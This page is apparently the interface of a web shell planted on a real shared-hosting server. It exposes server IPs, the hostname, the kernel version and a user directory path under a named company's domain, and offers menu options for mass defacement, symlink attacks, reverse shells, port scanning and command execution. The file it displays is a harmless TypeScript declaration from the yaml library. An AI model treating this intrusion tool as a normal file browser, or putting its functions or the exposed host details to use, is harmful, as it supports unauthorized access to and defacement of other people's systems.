Tul xxx Tul
User / IP
:
216.73.217.33
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
RESPALDOS
/
nomina
/
node_modules
/
yaml
/
dist
/
nodes
/
Viewing: Alias.d.ts
import type { Document } from '../doc/Document'; import type { FlowScalar } from '../parse/cst'; import type { StringifyContext } from '../stringify/stringify'; import type { Range } from './Node'; import { NodeBase } from './Node'; import type { Scalar } from './Scalar'; import type { ToJSContext } from './toJS'; import type { YAMLMap } from './YAMLMap'; import type { YAMLSeq } from './YAMLSeq'; export declare namespace Alias { interface Parsed extends Alias { range: Range; srcToken?: FlowScalar & { type: 'alias'; }; } } export declare class Alias extends NodeBase { source: string; anchor?: never; constructor(source: string); /** * Resolve the value of this alias within `doc`, finding the last * instance of the `source` anchor before this node. */ resolve(doc: Document, ctx?: ToJSContext): Scalar | YAMLMap | YAMLSeq | undefined; toJSON(_arg?: unknown, ctx?: ToJSContext): unknown; toString(ctx?: StringifyContext, _onComment?: () => void, _onChompKeep?: () => void): string; }
Coded With 💗 by
0x6ick